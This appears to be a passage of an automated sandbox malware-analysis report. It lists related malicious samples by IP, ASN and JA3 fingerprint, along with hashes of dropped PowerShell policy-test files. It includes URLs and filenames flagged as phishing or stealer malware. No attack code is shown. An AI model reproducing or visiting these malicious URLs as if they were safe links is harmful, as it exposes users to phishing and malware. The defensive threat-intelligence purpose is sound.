                                                                                                                      Code%20Send%20meta%20Discord%20EXE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                      • 34.117.59.81
                                                                                                                      http://url969.uniteddeleverycompany.com/ls/click?upn=u001.H7qy8CwvNpiem-2Bf7DeMFk7YJf68sOidxEWakApUPIOSZg2OY8dbdpgPNdKDwG5r9FFRxGTcDR4Y40gkedjWn5gmaEy2hdp5PhuemKZpyV0zDF4yZB1nSDE1glVUHkAxvk-2Bay1ScD58FIOgYpgYP6N0ScK3-2BfYjxiyiX8IVVnDpwETyB9eFyZIpVwHB3s73fG91OsUU5I5qElZ5zc-2F019KUvyyM6RxeXMegmcNjDutTA-2FnxufBtCMFX4wRkoDOM-2BzzsCiJIoY1mc9q42wLMHiq-2B4vv2-2FqoR1f2l-2BCmuACM5q-2FNbDZQstkQL5-2FH30fC7m19Rn-2BlXgwexRgjH0XwyNE8I2tRC8iv5uAUiLQk1AD6k0bLjsvdQWk9bfnh9YPL7n6nCIBdvs55pyxgyRAhb2C3g-3D-3DzLOu_oNIH2-2FxJ-2FTe1FaVJ1jWIKVy-2BRH8quBB-2F7-2FAZY1zuBa8sYO3A2kRlNC5SRLFjReRDbNAqQc8ija5eyvb3hMHW2LijdhuT99ojcYbvfeVDR6TjM8Iqq-2F4lpz7WKfkjLfs8kULSyk-2BJ2FHXElRwIq2EjJuur8G9AAw0HjpCQ3JV-2F1d4REvZ-2BdaWGeRZa46RgdqnKhZwT4HPC-2Fcr9dZBwLnURfD1x7OZfW9R3B1ZDWRdH1V-2F-2BR-2FWmM6h4NEHHRb9NNBhFNZPaY6piFBOFNOupA2OrFLOTElocKhsbRyDVGAbiBMte7-2BAjR-2BA2H-2F9CP2UREBvDHXsH-2BmlqvAryDrKjjAy8lTbA9nho9WLS1JKeGns5pAqmjv-2FPH8p3m8V8tFEPj2WLqfG6IzXwKcOMYvSrGYkMWMsBKmgc-2Bt-2BOg9a0jxMR-2BByynWcTgKhB44PNmoRQfd9lvEhtXtJnUleVDwJMZbPw60p1K6oxTexhzM9ScXx7kCprkCgMgcfi8rgis43afOn4xM8YRcMg9tIzu64CU7VuKJ-2BMFN5I78-2B8KPrNOjHK5o6ri9rwGpR8XbmEC-2BUi0PISrd7M-2BHCYWlP2o1TBL2OAmqufIzKPL-2F0NYk7NCFq-2BQEFmracNk-2BqqlMZ00PhqEs2JN98lsOxQ6MUbXZMcj-2FhqVBZVN97wkN60D56kJ-2FOQiaa7gW2IP4afUKBiy9Wl-2B0h0QTfxVEz3DZUlxRmNpooAbQL5Uk9Km4liDjAnP-2F9rKBZSc3OZEf33ZNLDn8jMDI2p9XCpZ-2BdDlLCTUAgCLNK0FE-2BJVvF9LYHxIrcC8tpkLszOdDeZHX2xcWm6Lc3y7tQCdb1uaEkAxyHmalygulTA8ODCE0Qj21BBKduU8fdD8C7u4Nqc-2BpJjM-2FhEfOBaq9vq0rNhSs4OVsJ7hESECV5WQ-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 34.117.59.81
                                                                                                                      fqr8nP1HfL.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 34.117.59.81
                                                                                                                      https://bb.vg/STDBANKGet hashmaliciousUnknownBrowse
                                                                                                                      • 34.117.59.81
                                                                                                                      V5P3YggUcy.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 34.117.59.81
                                                                                                                      raw.githubusercontent.cominterior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                      • 185.199.109.133
                                                                                                                      run.cmdGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.199.109.133
                                                                                                                      PYsje7DgYO.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                      • 185.199.109.133
                                                                                                                      EcjH6Dq36Y.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                      • 185.199.108.133
                                                                                                                      MsmxWY8nj7.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                      • 185.199.110.133
                                                                                                                      ea4LTmpMwl.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                      • 185.199.110.133
                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.199.108.133
                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, DarkTortilla, Discord Token Stealer, DotStealer, LummaC Stealer, StealcBrowse
                                                                                                                      • 185.199.108.133
                                                                                                                      file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                      • 185.199.108.133
                                                                                                                      resume.docx.lnkGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.199.110.133
                                                                                                                      github.comDfim58cp4J.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      run.cmdGet hashmaliciousUnknownBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      PYsje7DgYO.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      EcjH6Dq36Y.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      MsmxWY8nj7.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      Y5kEUsYDFr.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      QlyOUFGIFB.exeGet hashmaliciousMicroClipBrowse
                                                                                                                      • 20.233.83.146
                                                                                                                      Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                                                                                      • 20.233.83.145

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      FASTLYUSDfim58cp4J.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 185.199.110.133
                                                                                                                      interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                      • 185.199.109.133
                                                                                                                      Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 151.101.1.137
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 151.101.129.91
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 151.101.193.91
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 151.101.193.91
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 151.101.1.91
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 151.101.129.91
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 151.101.193.91
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 151.101.129.91
                                                                                                                      GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                      • 34.117.188.166
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 34.117.188.166
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 34.117.188.166
                                                                                                                      rebirth.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                      • 34.118.114.130
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 34.117.188.166
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 34.117.188.166
                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                      • 34.117.188.166
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 34.117.188.166
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 34.117.188.166
                                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                      • 34.117.188.166
                                                                                                                      MICROSOFT-CORP-MSN-AS-BLOCKUSDfim58cp4J.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      rebirth.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                      • 20.62.247.7
                                                                                                                      rebirth.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                      • 13.95.148.131
                                                                                                                      rebirth.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                      • 52.136.145.101
                                                                                                                      la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 22.233.96.48
                                                                                                                      la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 22.33.214.221
                                                                                                                      la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 13.81.52.250
                                                                                                                      la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 13.79.240.226
                                                                                                                      la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 52.254.132.4

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      bd0bf25947d4a37404f0424edf4db9adSecuriteInfo.com.Win64.Evo-gen.6610.27408.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      • 34.117.59.81
                                                                                                                      SecuriteInfo.com.Win64.Evo-gen.9614.31304.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      • 34.117.59.81
                                                                                                                      SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      • 34.117.59.81
                                                                                                                      app64.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      • 34.117.59.81
                                                                                                                      SecuriteInfo.com.FileRepMalware.12585.5759.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      • 34.117.59.81
                                                                                                                      SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      • 34.117.59.81
                                                                                                                      SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      • 34.117.59.81
                                                                                                                      sadfwqefrqw3f.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      • 34.117.59.81
                                                                                                                      SecuriteInfo.com.Win64.Evo-gen.20107.17462.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      • 34.117.59.81
                                                                                                                      SecuriteInfo.com.FileRepMalware.12025.7543.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 20.233.83.145
                                                                                                                      • 34.117.59.81
                                                                                                                      74954a0c86284d0d6e1c4efefe92b521new.ini.ps1Get hashmaliciousUnknownBrowse
                                                                                                                      • 185.199.109.133
                                                                                                                      • 20.233.83.145
                                                                                                                      ALFq7XP17d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.199.109.133
                                                                                                                      • 20.233.83.145
                                                                                                                      kYGxoN4JVW.batGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.199.109.133
                                                                                                                      • 20.233.83.145
                                                                                                                      pn866G3CCj.lnkGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.199.109.133
                                                                                                                      • 20.233.83.145
                                                                                                                      vZAhXkWkDT.lnkGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.199.109.133
                                                                                                                      • 20.233.83.145
                                                                                                                      QsEn4Jw9pY.lnkGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.199.109.133
                                                                                                                      • 20.233.83.145
                                                                                                                      ylNk78QlB8.lnkGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.199.109.133
                                                                                                                      • 20.233.83.145
                                                                                                                      Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).batGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.199.109.133
                                                                                                                      • 20.233.83.145
                                                                                                                      document.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.199.109.133
                                                                                                                      • 20.233.83.145
                                                                                                                      ZOL2mIYAUH.exeGet hashmaliciousPhemedrone Stealer, PureLog Stealer, XWorm, zgRATBrowse
                                                                                                                      • 185.199.109.133
                                                                                                                      • 20.233.83.145

                                                                                                                      Dropped Files

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      C:\Users\user\Desktop\libcurl.dllSecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                                                                        app64.exeGet hashmaliciousUnknownBrowse
                                                                                                                          C:\Users\user\Desktop\zlib1.dllSecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                                                                            app64.exeGet hashmaliciousUnknownBrowse

                                                                                                                              Created / dropped Files

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):64
                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                              Malicious:false
                                                                                                                              Preview:@...e...........................................................

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0o1l3wic.kss.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_122x0tii.0x4.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23ppnleq.atf.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2mbxhxxc.bke.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3c3wxmcr.tk0.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3p2uhbwt.mgm.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_45syprzo.tde.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4lfjwzxz.n5s.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xoeutez.o0f.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ax2sheua.ecl.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axihyhjw.53a.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b5323c2g.z2c.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bui3ribf.fqj.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dolqrguq.5bo.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5qorz1m.rxh.psm1

                                                                                                                              Download File
